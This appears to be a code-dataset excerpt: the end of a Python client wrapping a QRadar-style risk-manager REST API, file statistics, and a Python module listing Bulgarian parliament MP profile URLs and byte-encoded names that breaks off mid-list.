function_endpoint = urljoin(self._baseurl, 'simulation_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@request_vars('fields')
def get_simulation_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /qrm/simulation_groups/{group_id}
Retrieves a simulation group.
"""
function_endpoint = urljoin(self._baseurl, 'simulation_groups/{group_id}'.format(group_id=group_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_topology_saved_search_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /qrm/topology_saved_search_groups
Retrieves a list of topology saved search groups.
"""
function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups')
return self._call('GET', function_endpoint, **kwargs)
def delete_topology_saved_search_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /qrm/topology_saved_search_groups/{group_id}
Deletes a topology saved search group.
"""
function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('fields')
def post_topology_saved_search_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /qrm/topology_saved_search_groups/{group_id}
Updates the owner of an topology saved search group.
"""
function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
@request_vars('fields')
def get_topology_saved_search_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /qrm/topology_saved_search_groups/{group_id}
Retrieves a topology saved search group.
"""
function_endpoint = urljoin(self._baseurl, 'topology_saved_search_groups/{group_id}'.format(group_id=group_id))
return self._call('GET', function_endpoint, **kwargs)
| 43.676768
| 119
| 0.671716
| 1,066
| 8,648
| 5.102251
| 0.057223
| 0.11583
| 0.071704
| 0.099283
| 0.95091
| 0.912484
| 0.887663
| 0.820371
| 0.784887
| 0.730649
| 0
| 0.000437
| 0.205828
| 8,648
| 197
| 120
| 43.898477
| 0.791497
| 0.179579
| 0
| 0.611111
| 0
| 0
| 0.127574
| 0.077566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.233333
| false
| 0
| 0.044444
| 0
| 0.522222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
52b13b4ae53b9777679bf154e2238fc968ec3714
| 174,757
|
py
|
Python
|
my.py
|
Krastanov/parlamentaren-kontrol
|
f79f2408001ae119a43477d4ceeeb14780f5ce70
|
[
"BSD-3-Clause"
] | 1
|
2020-03-26T19:01:06.000Z
|
2020-03-26T19:01:06.000Z
|
my.py
|
Krastanov/parlamentaren-kontrol
|
f79f2408001ae119a43477d4ceeeb14780f5ce70
|
[
"BSD-3-Clause"
] | null | null | null |
my.py
|
Krastanov/parlamentaren-kontrol
|
f79f2408001ae119a43477d4ceeeb14780f5ce70
|
[
"BSD-3-Clause"
] | null | null | null |
from pk_tools import canonical_party_name
url = [u'http://www.parliament.bg/bg/MP/835', u'http://www.parliament.bg/bg/MP/836', u'http://www.parliament.bg/bg/MP/837', u'http://www.parliament.bg/bg/MP/838', u'http://www.parliament.bg/bg/MP/839', u'http://www.parliament.bg/bg/MP/840', u'http://www.parliament.bg/bg/MP/841', u'http://www.parliament.bg/bg/MP/842', u'http://www.parliament.bg/bg/MP/843', u'http://www.parliament.bg/bg/MP/844', u'http://www.parliament.bg/bg/MP/845', u'http://www.parliament.bg/bg/MP/846', u'http://www.parliament.bg/bg/MP/847', u'http://www.parliament.bg/bg/MP/848', u'http://www.parliament.bg/bg/MP/849', u'http://www.parliament.bg/bg/MP/850', u'http://www.parliament.bg/bg/MP/851', u'http://www.parliament.bg/bg/MP/852', u'http://www.parliament.bg/bg/MP/853', u'http://www.parliament.bg/bg/MP/854', u'http://www.parliament.bg/bg/MP/855', u'http://www.parliament.bg/bg/MP/856', u'http://www.parliament.bg/bg/MP/857', u'http://www.parliament.bg/bg/MP/858', u'http://www.parliament.bg/bg/MP/859', u'http://www.parliament.bg/bg/MP/860', u'http://www.parliament.bg/bg/MP/861', u'http://www.parliament.bg/bg/MP/862', u'http://www.parliament.bg/bg/MP/863', u'http://www.parliament.bg/bg/MP/864', u'http://www.parliament.bg/bg/MP/865', u'http://www.parliament.bg/bg/MP/866', u'http://www.parliament.bg/bg/MP/867', u'http://www.parliament.bg/bg/MP/868', u'http://www.parliament.bg/bg/MP/869', u'http://www.parliament.bg/bg/MP/870', u'http://www.parliament.bg/bg/MP/871', u'http://www.parliament.bg/bg/MP/872', u'http://www.parliament.bg/bg/MP/873', u'http://www.parliament.bg/bg/MP/874', u'http://www.parliament.bg/bg/MP/875', u'http://www.parliament.bg/bg/MP/876', u'http://www.parliament.bg/bg/MP/877', u'http://www.parliament.bg/bg/MP/878', u'http://www.parliament.bg/bg/MP/879', u'http://www.parliament.bg/bg/MP/880', u'http://www.parliament.bg/bg/MP/881', u'http://www.parliament.bg/bg/MP/882', u'http://www.parliament.bg/bg/MP/883', u'http://www.parliament.bg/bg/MP/884', u'http://www.parliament.bg/bg/MP/885', u'http://www.parliament.bg/bg/MP/886', u'http://www.parliament.bg/bg/MP/887', u'http://www.parliament.bg/bg/MP/888', u'http://www.parliament.bg/bg/MP/889', u'http://www.parliament.bg/bg/MP/890', u'http://www.parliament.bg/bg/MP/891', u'http://www.parliament.bg/bg/MP/892', u'http://www.parliament.bg/bg/MP/893', u'http://www.parliament.bg/bg/MP/894', u'http://www.parliament.bg/bg/MP/895', u'http://www.parliament.bg/bg/MP/896', u'http://www.parliament.bg/bg/MP/897', u'http://www.parliament.bg/bg/MP/898', u'http://www.parliament.bg/bg/MP/899', u'http://www.parliament.bg/bg/MP/900', u'http://www.parliament.bg/bg/MP/901', u'http://www.parliament.bg/bg/MP/902', u'http://www.parliament.bg/bg/MP/903', u'http://www.parliament.bg/bg/MP/904', u'http://www.parliament.bg/bg/MP/905', u'http://www.parliament.bg/bg/MP/906', u'http://www.parliament.bg/bg/MP/907', u'http://www.parliament.bg/bg/MP/908', u'http://www.parliament.bg/bg/MP/909', u'http://www.parliament.bg/bg/MP/910', u'http://www.parliament.bg/bg/MP/911', u'http://www.parliament.bg/bg/MP/912', u'http://www.parliament.bg/bg/MP/913', u'http://www.parliament.bg/bg/MP/914', u'http://www.parliament.bg/bg/MP/915', u'http://www.parliament.bg/bg/MP/916', u'http://www.parliament.bg/bg/MP/917', u'http://www.parliament.bg/bg/MP/918', u'http://www.parliament.bg/bg/MP/919', u'http://www.parliament.bg/bg/MP/920', u'http://www.parliament.bg/bg/MP/921', u'http://www.parliament.bg/bg/MP/922', u'http://www.parliament.bg/bg/MP/923', u'http://www.parliament.bg/bg/MP/924', u'http://www.parliament.bg/bg/MP/925', u'http://www.parliament.bg/bg/MP/926', u'http://www.parliament.bg/bg/MP/927', u'http://www.parliament.bg/bg/MP/928', u'http://www.parliament.bg/bg/MP/929', u'http://www.parliament.bg/bg/MP/930', u'http://www.parliament.bg/bg/MP/931', u'http://www.parliament.bg/bg/MP/932', u'http://www.parliament.bg/bg/MP/933', u'http://www.parliament.bg/bg/MP/934', u'http://www.parliament.bg/bg/MP/935', u'http://www.parliament.bg/bg/MP/936', u'http://www.parliament.bg/bg/MP/937', u'http://www.parliament.bg/bg/MP/938', u'http://www.parliament.bg/bg/MP/939', u'http://www.parliament.bg/bg/MP/940', u'http://www.parliament.bg/bg/MP/941', u'http://www.parliament.bg/bg/MP/942', u'http://www.parliament.bg/bg/MP/943', u'http://www.parliament.bg/bg/MP/944', u'http://www.parliament.bg/bg/MP/945', u'http://www.parliament.bg/bg/MP/946', u'http://www.parliament.bg/bg/MP/947', u'http://www.parliament.bg/bg/MP/948', u'http://www.parliament.bg/bg/MP/949', u'http://www.parliament.bg/bg/MP/950', u'http://www.parliament.bg/bg/MP/951', u'http://www.parliament.bg/bg/MP/952', u'http://www.parliament.bg/bg/MP/953', u'http://www.parliament.bg/bg/MP/954', u'http://www.parliament.bg/bg/MP/955', u'http://www.parliament.bg/bg/MP/956', u'http://www.parliament.bg/bg/MP/957', u'http://www.parliament.bg/bg/MP/958', u'http://www.parliament.bg/bg/MP/959', u'http://www.parliament.bg/bg/MP/960', u'http://www.parliament.bg/bg/MP/961', u'http://www.parliament.bg/bg/MP/962', u'http://www.parliament.bg/bg/MP/963', u'http://www.parliament.bg/bg/MP/964', u'http://www.parliament.bg/bg/MP/965', u'http://www.parliament.bg/bg/MP/966', u'http://www.parliament.bg/bg/MP/967', u'http://www.parliament.bg/bg/MP/968', u'http://www.parliament.bg/bg/MP/969', u'http://www.parliament.bg/bg/MP/970', u'http://www.parliament.bg/bg/MP/971', u'http://www.parliament.bg/bg/MP/972', u'http://www.parliament.bg/bg/MP/973', u'http://www.parliament.bg/bg/MP/974', u'http://www.parliament.bg/bg/MP/975', u'http://www.parliament.bg/bg/MP/976', u'http://www.parliament.bg/bg/MP/977', u'http://www.parliament.bg/bg/MP/978', u'http://www.parliament.bg/bg/MP/979', u'http://www.parliament.bg/bg/MP/980', u'http://www.parliament.bg/bg/MP/981', u'http://www.parliament.bg/bg/MP/982', u'http://www.parliament.bg/bg/MP/983', u'http://www.parliament.bg/bg/MP/984', u'http://www.parliament.bg/bg/MP/985', u'http://www.parliament.bg/bg/MP/986', u'http://www.parliament.bg/bg/MP/987', u'http://www.parliament.bg/bg/MP/988', u'http://www.parliament.bg/bg/MP/989', u'http://www.parliament.bg/bg/MP/990', u'http://www.parliament.bg/bg/MP/991', u'http://www.parliament.bg/bg/MP/992', u'http://www.parliament.bg/bg/MP/993', u'http://www.parliament.bg/bg/MP/994', u'http://www.parliament.bg/bg/MP/995', u'http://www.parliament.bg/bg/MP/996', u'http://www.parliament.bg/bg/MP/997', u'http://www.parliament.bg/bg/MP/998', u'http://www.parliament.bg/bg/MP/999', u'http://www.parliament.bg/bg/MP/1000', u'http://www.parliament.bg/bg/MP/1001', u'http://www.parliament.bg/bg/MP/1002', u'http://www.parliament.bg/bg/MP/1003', u'http://www.parliament.bg/bg/MP/1004', u'http://www.parliament.bg/bg/MP/1005', u'http://www.parliament.bg/bg/MP/1006', u'http://www.parliament.bg/bg/MP/1007', u'http://www.parliament.bg/bg/MP/1008', u'http://www.parliament.bg/bg/MP/1009', u'http://www.parliament.bg/bg/MP/1010', u'http://www.parliament.bg/bg/MP/1011', u'http://www.parliament.bg/bg/MP/1012', u'http://www.parliament.bg/bg/MP/1013', u'http://www.parliament.bg/bg/MP/1014', u'http://www.parliament.bg/bg/MP/1015', u'http://www.parliament.bg/bg/MP/1016', u'http://www.parliament.bg/bg/MP/1017', u'http://www.parliament.bg/bg/MP/1018', u'http://www.parliament.bg/bg/MP/1019', u'http://www.parliament.bg/bg/MP/1020', u'http://www.parliament.bg/bg/MP/1021', u'http://www.parliament.bg/bg/MP/1022', u'http://www.parliament.bg/bg/MP/1023', u'http://www.parliament.bg/bg/MP/1024', u'http://www.parliament.bg/bg/MP/1025', u'http://www.parliament.bg/bg/MP/1026', u'http://www.parliament.bg/bg/MP/1027', u'http://www.parliament.bg/bg/MP/1028', u'http://www.parliament.bg/bg/MP/1029', u'http://www.parliament.bg/bg/MP/1030', u'http://www.parliament.bg/bg/MP/1031', u'http://www.parliament.bg/bg/MP/1032', u'http://www.parliament.bg/bg/MP/1033', u'http://www.parliament.bg/bg/MP/1034', u'http://www.parliament.bg/bg/MP/1035', u'http://www.parliament.bg/bg/MP/1036', u'http://www.parliament.bg/bg/MP/1037', u'http://www.parliament.bg/bg/MP/1038', u'http://www.parliament.bg/bg/MP/1039', u'http://www.parliament.bg/bg/MP/1040', u'http://www.parliament.bg/bg/MP/1041', u'http://www.parliament.bg/bg/MP/1042', u'http://www.parliament.bg/bg/MP/1043', u'http://www.parliament.bg/bg/MP/1044', u'http://www.parliament.bg/bg/MP/1045', u'http://www.parliament.bg/bg/MP/1046', u'http://www.parliament.bg/bg/MP/1047', u'http://www.parliament.bg/bg/MP/1048', u'http://www.parliament.bg/bg/MP/1049', u'http://www.parliament.bg/bg/MP/1050', u'http://www.parliament.bg/bg/MP/1051', u'http://www.parliament.bg/bg/MP/1052', u'http://www.parliament.bg/bg/MP/1053', u'http://www.parliament.bg/bg/MP/1054', u'http://www.parliament.bg/bg/MP/1055', u'http://www.parliament.bg/bg/MP/1056', u'http://www.parliament.bg/bg/MP/1057', u'http://www.parliament.bg/bg/MP/1058', u'http://www.parliament.bg/bg/MP/1059', u'http://www.parliament.bg/bg/MP/1060', u'http://www.parliament.bg/bg/MP/1061', u'http://www.parliament.bg/bg/MP/1062', u'http://www.parliament.bg/bg/MP/1063', u'http://www.parliament.bg/bg/MP/1064', u'http://www.parliament.bg/bg/MP/1065', u'http://www.parliament.bg/bg/MP/1066', u'http://www.parliament.bg/bg/MP/1067', u'http://www.parliament.bg/bg/MP/1068', u'http://www.parliament.bg/bg/MP/1069', u'http://www.parliament.bg/bg/MP/1070', u'http://www.parliament.bg/bg/MP/1071', u'http://www.parliament.bg/bg/MP/1072', u'http://www.parliament.bg/bg/MP/1073', u'http://www.parliament.bg/bg/MP/1074', u'http://www.parliament.bg/bg/MP/1075', u'http://www.parliament.bg/bg/MP/1076', u'http://www.parliament.bg/bg/MP/1077', u'http://www.parliament.bg/bg/MP/1078', u'http://www.parliament.bg/bg/MP/1079', u'http://www.parliament.bg/bg/MP/1080', u'http://www.parliament.bg/bg/MP/1081', u'http://www.parliament.bg/bg/MP/1082', u'http://www.parliament.bg/bg/MP/1083', u'http://www.parliament.bg/bg/MP/1084', u'http://www.parliament.bg/bg/MP/1085', u'http://www.parliament.bg/bg/MP/1086', u'http://www.parliament.bg/bg/MP/1087', u'http://www.parliament.bg/bg/MP/1088', u'http://www.parliament.bg/bg/MP/1089', u'http://www.parliament.bg/bg/MP/1108', u'http://www.parliament.bg/bg/MP/1112', u'http://www.parliament.bg/bg/MP/1113', u'http://www.parliament.bg/bg/MP/1114', u'http://www.parliament.bg/bg/MP/1115', u'http://www.parliament.bg/bg/MP/1116', u'http://www.parliament.bg/bg/MP/1117', u'http://www.parliament.bg/bg/MP/1118', u'http://www.parliament.bg/bg/MP/1119', u'http://www.parliament.bg/bg/MP/1120', u'http://www.parliament.bg/bg/MP/1122', u'http://www.parliament.bg/bg/MP/1123', u'http://www.parliament.bg/bg/MP/1124', u'http://www.parliament.bg/bg/MP/1127', u'http://www.parliament.bg/bg/MP/1128', u'http://www.parliament.bg/bg/MP/1129', u'http://www.parliament.bg/bg/MP/1130', u'http://www.parliament.bg/bg/MP/1131', u'http://www.parliament.bg/bg/MP/1132', u'http://www.parliament.bg/bg/MP/1133', u'http://www.parliament.bg/bg/MP/1134', u'http://www.parliament.bg/bg/MP/1135', u'http://www.parliament.bg/bg/MP/1136', u'http://www.parliament.bg/bg/MP/1137', u'http://www.parliament.bg/bg/MP/1138', u'http://www.parliament.bg/bg/MP/1440', u'http://www.parliament.bg/bg/MP/1441', u'http://www.parliament.bg/bg/MP/1442', u'http://www.parliament.bg/bg/MP/1443', u'http://www.parliament.bg/bg/MP/1444', u'http://www.parliament.bg/bg/MP/1445', u'http://www.parliament.bg/bg/MP/1446', u'http://www.parliament.bg/bg/MP/1447', u'http://www.parliament.bg/bg/MP/1448', u'http://www.parliament.bg/bg/MP/1449', u'http://www.parliament.bg/bg/MP/1450', u'http://www.parliament.bg/bg/MP/1451', u'http://www.parliament.bg/bg/MP/1452', u'http://www.parliament.bg/bg/MP/1453', u'http://www.parliament.bg/bg/MP/1454', u'http://www.parliament.bg/bg/MP/1455', u'http://www.parliament.bg/bg/MP/1456', u'http://www.parliament.bg/bg/MP/1457', u'http://www.parliament.bg/bg/MP/1458', u'http://www.parliament.bg/bg/MP/1459', u'http://www.parliament.bg/bg/MP/1460', u'http://www.parliament.bg/bg/MP/1461', u'http://www.parliament.bg/bg/MP/1462', u'http://www.parliament.bg/bg/MP/1463', u'http://www.parliament.bg/bg/MP/1464', u'http://www.parliament.bg/bg/MP/1465', u'http://www.parliament.bg/bg/MP/1466', u'http://www.parliament.bg/bg/MP/1467', u'http://www.parliament.bg/bg/MP/1468', u'http://www.parliament.bg/bg/MP/1469', u'http://www.parliament.bg/bg/MP/1470', u'http://www.parliament.bg/bg/MP/1471', u'http://www.parliament.bg/bg/MP/1472', u'http://www.parliament.bg/bg/MP/1473', u'http://www.parliament.bg/bg/MP/1474', u'http://www.parliament.bg/bg/MP/1475', u'http://www.parliament.bg/bg/MP/1476', u'http://www.parliament.bg/bg/MP/1477', u'http://www.parliament.bg/bg/MP/1478', u'http://www.parliament.bg/bg/MP/1479', u'http://www.parliament.bg/bg/MP/1480', u'http://www.parliament.bg/bg/MP/1481', u'http://www.parliament.bg/bg/MP/1482', u'http://www.parliament.bg/bg/MP/1483', u'http://www.parliament.bg/bg/MP/1484', u'http://www.parliament.bg/bg/MP/1485', u'http://www.parliament.bg/bg/MP/1486', u'http://www.parliament.bg/bg/MP/1487', u'http://www.parliament.bg/bg/MP/1488', u'http://www.parliament.bg/bg/MP/1489', u'http://www.parliament.bg/bg/MP/1490', u'http://www.parliament.bg/bg/MP/1491', u'http://www.parliament.bg/bg/MP/1492', u'http://www.parliament.bg/bg/MP/1493', u'http://www.parliament.bg/bg/MP/1494', u'http://www.parliament.bg/bg/MP/1495', u'http://www.parliament.bg/bg/MP/1496', u'http://www.parliament.bg/bg/MP/1497', u'http://www.parliament.bg/bg/MP/1498', u'http://www.parliament.bg/bg/MP/1499', u'http://www.parliament.bg/bg/MP/1500', u'http://www.parliament.bg/bg/MP/1501', u'http://www.parliament.bg/bg/MP/1502', u'http://www.parliament.bg/bg/MP/1503', u'http://www.parliament.bg/bg/MP/1504', u'http://www.parliament.bg/bg/MP/1505', u'http://www.parliament.bg/bg/MP/1506', u'http://www.parliament.bg/bg/MP/1507', u'http://www.parliament.bg/bg/MP/1508', u'http://www.parliament.bg/bg/MP/1509', u'http://www.parliament.bg/bg/MP/1510', u'http://www.parliament.bg/bg/MP/1511', u'http://www.parliament.bg/bg/MP/1512', u'http://www.parliament.bg/bg/MP/1513', u'http://www.parliament.bg/bg/MP/1514', u'http://www.parliament.bg/bg/MP/1515', u'http://www.parliament.bg/bg/MP/1516', u'http://www.parliament.bg/bg/MP/1517', u'http://www.parliament.bg/bg/MP/1518', u'http://www.parliament.bg/bg/MP/1519', u'http://www.parliament.bg/bg/MP/1520', u'http://www.parliament.bg/bg/MP/1521', u'http://www.parliament.bg/bg/MP/1522', u'http://www.parliament.bg/bg/MP/1523', u'http://www.parliament.bg/bg/MP/1524', u'http://www.parliament.bg/bg/MP/1525', u'http://www.parliament.bg/bg/MP/1526', u'http://www.parliament.bg/bg/MP/1527', u'http://www.parliament.bg/bg/MP/1528', u'http://www.parliament.bg/bg/MP/1529', u'http://www.parliament.bg/bg/MP/1530', u'http://www.parliament.bg/bg/MP/1531', u'http://www.parliament.bg/bg/MP/1532', u'http://www.parliament.bg/bg/MP/1533', u'http://www.parliament.bg/bg/MP/1534', u'http://www.parliament.bg/bg/MP/1535', u'http://www.parliament.bg/bg/MP/1536', u'http://www.parliament.bg/bg/MP/1537', u'http://www.parliament.bg/bg/MP/1538', u'http://www.parliament.bg/bg/MP/1539', u'http://www.parliament.bg/bg/MP/1540', u'http://www.parliament.bg/bg/MP/1541', u'http://www.parliament.bg/bg/MP/1542', u'http://www.parliament.bg/bg/MP/1543', u'http://www.parliament.bg/bg/MP/1544', u'http://www.parliament.bg/bg/MP/1545', u'http://www.parliament.bg/bg/MP/1546', u'http://www.parliament.bg/bg/MP/1547', u'http://www.parliament.bg/bg/MP/1548', u'http://www.parliament.bg/bg/MP/1549', u'http://www.parliament.bg/bg/MP/1550', u'http://www.parliament.bg/bg/MP/1551', u'http://www.parliament.bg/bg/MP/1552', u'http://www.parliament.bg/bg/MP/1553', u'http://www.parliament.bg/bg/MP/1554', u'http://www.parliament.bg/bg/MP/1555', u'http://www.parliament.bg/bg/MP/1556', u'http://www.parliament.bg/bg/MP/1557', u'http://www.parliament.bg/bg/MP/1558', u'http://www.parliament.bg/bg/MP/1559', u'http://www.parliament.bg/bg/MP/1560', u'http://www.parliament.bg/bg/MP/1561', u'http://www.parliament.bg/bg/MP/1562', u'http://www.parliament.bg/bg/MP/1563', u'http://www.parliament.bg/bg/MP/1564', u'http://www.parliament.bg/bg/MP/1565', u'http://www.parliament.bg/bg/MP/1566', u'http://www.parliament.bg/bg/MP/1567', u'http://www.parliament.bg/bg/MP/1568', u'http://www.parliament.bg/bg/MP/1569', u'http://www.parliament.bg/bg/MP/1570', u'http://www.parliament.bg/bg/MP/1571', u'http://www.parliament.bg/bg/MP/1572', u'http://www.parliament.bg/bg/MP/1573', u'http://www.parliament.bg/bg/MP/1574', u'http://www.parliament.bg/bg/MP/1575', u'http://www.parliament.bg/bg/MP/1576', u'http://www.parliament.bg/bg/MP/1577', u'http://www.parliament.bg/bg/MP/1578', u'http://www.parliament.bg/bg/MP/1579', u'http://www.parliament.bg/bg/MP/1580', u'http://www.parliament.bg/bg/MP/1581', u'http://www.parliament.bg/bg/MP/1582', u'http://www.parliament.bg/bg/MP/1583', u'http://www.parliament.bg/bg/MP/1584', u'http://www.parliament.bg/bg/MP/1585', u'http://www.parliament.bg/bg/MP/1586', u'http://www.parliament.bg/bg/MP/1587', u'http://www.parliament.bg/bg/MP/1588', u'http://www.parliament.bg/bg/MP/1589', u'http://www.parliament.bg/bg/MP/1590', u'http://www.parliament.bg/bg/MP/1591', u'http://www.parliament.bg/bg/MP/1592', u'http://www.parliament.bg/bg/MP/1593', u'http://www.parliament.bg/bg/MP/1594', u'http://www.parliament.bg/bg/MP/1595', u'http://www.parliament.bg/bg/MP/1596', u'http://www.parliament.bg/bg/MP/1597', u'http://www.parliament.bg/bg/MP/1598', u'http://www.parliament.bg/bg/MP/1599', u'http://www.parliament.bg/bg/MP/1600', u'http://www.parliament.bg/bg/MP/1601', u'http://www.parliament.bg/bg/MP/1602', u'http://www.parliament.bg/bg/MP/1603', u'http://www.parliament.bg/bg/MP/1604', u'http://www.parliament.bg/bg/MP/1605', u'http://www.parliament.bg/bg/MP/1606', u'http://www.parliament.bg/bg/MP/1607', u'http://www.parliament.bg/bg/MP/1608', u'http://www.parliament.bg/bg/MP/1609', u'http://www.parliament.bg/bg/MP/1610', u'http://www.parliament.bg/bg/MP/1611', u'http://www.parliament.bg/bg/MP/1612', u'http://www.parliament.bg/bg/MP/1613', u'http://www.parliament.bg/bg/MP/1614', u'http://www.parliament.bg/bg/MP/1615', u'http://www.parliament.bg/bg/MP/1616', u'http://www.parliament.bg/bg/MP/1617', u'http://www.parliament.bg/bg/MP/1618', u'http://www.parliament.bg/bg/MP/1619', u'http://www.parliament.bg/bg/MP/1620', u'http://www.parliament.bg/bg/MP/1621', u'http://www.parliament.bg/bg/MP/1622', u'http://www.parliament.bg/bg/MP/1623', u'http://www.parliament.bg/bg/MP/1624', u'http://www.parliament.bg/bg/MP/1625', u'http://www.parliament.bg/bg/MP/1626', u'http://www.parliament.bg/bg/MP/1627', u'http://www.parliament.bg/bg/MP/1628', u'http://www.parliament.bg/bg/MP/1629', u'http://www.parliament.bg/bg/MP/1630', u'http://www.parliament.bg/bg/MP/1631', u'http://www.parliament.bg/bg/MP/1632', u'http://www.parliament.bg/bg/MP/1633', u'http://www.parliament.bg/bg/MP/1634', u'http://www.parliament.bg/bg/MP/1635', u'http://www.parliament.bg/bg/MP/1636', u'http://www.parliament.bg/bg/MP/1637', u'http://www.parliament.bg/bg/MP/1638', u'http://www.parliament.bg/bg/MP/1639', u'http://www.parliament.bg/bg/MP/1640', u'http://www.parliament.bg/bg/MP/1641', u'http://www.parliament.bg/bg/MP/1642', u'http://www.parliament.bg/bg/MP/1643', u'http://www.parliament.bg/bg/MP/1644', u'http://www.parliament.bg/bg/MP/1645', u'http://www.parliament.bg/bg/MP/1647', u'http://www.parliament.bg/bg/MP/1648', u'http://www.parliament.bg/bg/MP/1649', u'http://www.parliament.bg/bg/MP/1650', u'http://www.parliament.bg/bg/MP/1653', u'http://www.parliament.bg/bg/MP/1654', u'http://www.parliament.bg/bg/MP/1655', u'http://www.parliament.bg/bg/MP/1656', u'http://www.parliament.bg/bg/MP/1657', u'http://www.parliament.bg/bg/MP/1658', u'http://www.parliament.bg/bg/MP/1659', u'http://www.parliament.bg/bg/MP/1660', u'http://www.parliament.bg/bg/MP/1661', u'http://www.parliament.bg/bg/MP/1662', u'http://www.parliament.bg/bg/MP/1663', u'http://www.parliament.bg/bg/MP/1664', u'http://www.parliament.bg/bg/MP/1665', u'http://www.parliament.bg/bg/MP/1666', u'http://www.parliament.bg/bg/MP/1667', u'http://www.parliament.bg/bg/MP/1668', u'http://www.parliament.bg/bg/MP/1669', u'http://www.parliament.bg/bg/MP/1670', u'http://www.parliament.bg/bg/MP/1671', u'http://www.parliament.bg/bg/MP/1672', u'http://www.parliament.bg/bg/MP/1673', u'http://www.parliament.bg/bg/MP/1674', u'http://www.parliament.bg/bg/MP/1675', u'http://www.parliament.bg/bg/MP/1676', u'http://www.parliament.bg/bg/MP/1677', u'http://www.parliament.bg/bg/MP/1678', u'http://www.parliament.bg/bg/MP/1679', u'http://www.parliament.bg/bg/MP/1680', u'http://www.parliament.bg/bg/MP/1681', u'http://www.parliament.bg/bg/MP/1682', u'http://www.parliament.bg/bg/MP/1683', u'http://www.parliament.bg/bg/MP/1684', u'http://www.parliament.bg/bg/MP/1685', u'http://www.parliament.bg/bg/MP/1686', u'http://www.parliament.bg/bg/MP/1687', u'http://www.parliament.bg/bg/MP/1688', u'http://www.parliament.bg/bg/MP/1689', u'http://www.parliament.bg/bg/MP/1690', u'http://www.parliament.bg/bg/MP/1691', u'http://www.parliament.bg/bg/MP/1692', u'http://www.parliament.bg/bg/MP/1693', u'http://www.parliament.bg/bg/MP/1694', u'http://www.parliament.bg/bg/MP/1695', u'http://www.parliament.bg/bg/MP/1696', u'http://www.parliament.bg/bg/MP/1697', u'http://www.parliament.bg/bg/MP/1698', u'http://www.parliament.bg/bg/MP/1699', u'http://www.parliament.bg/bg/MP/1700', u'http://www.parliament.bg/bg/MP/1701', u'http://www.parliament.bg/bg/MP/1702', u'http://www.parliament.bg/bg/MP/1703', u'http://www.parliament.bg/bg/MP/1704', u'http://www.parliament.bg/bg/MP/1705', u'http://www.parliament.bg/bg/MP/1706', u'http://www.parliament.bg/bg/MP/1707', u'http://www.parliament.bg/bg/MP/1708', u'http://www.parliament.bg/bg/MP/1709', u'http://www.parliament.bg/bg/MP/1727', u'http://www.parliament.bg/bg/MP/1728', u'http://www.parliament.bg/bg/MP/1729', u'http://www.parliament.bg/bg/MP/1730', u'http://www.parliament.bg/bg/MP/1732', u'http://www.parliament.bg/bg/MP/1733', u'http://www.parliament.bg/bg/MP/1734']
url = [int(_.split('/')[-1]) for _ in url]
name = ['\xd0\x90\xd0\x9b\xd0\x98\xd0\x9e\xd0\xa1\xd0\x9c\xd0\x90\xd0\x9d \xd0\x98\xd0\x91\xd0\xa0\xd0\x90\xd0\x98\xd0\x9c \xd0\x98\xd0\x9c\xd0\x90\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9a\xd0\x95\xd0\x92 \xd0\x9a\xd0\x90\xd0\x9c\xd0\x91\xd0\x98\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x9a\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98\xd0\xaf \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\xa2\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x98\xd0\xa2\xd0\x9a\xd0\x9e \xd0\x96\xd0\x98\xd0\x92\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x97\xd0\x90\xd0\xa5\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\xa3\xd0\xa1\xd0\x90 \xd0\x94\xd0\x96\xd0\x95\xd0\x9c\xd0\x90\xd0\x9b \xd0\x9f\xd0\x90\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x9e\xd0\x93\xd0\x9d\xd0\xaf\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 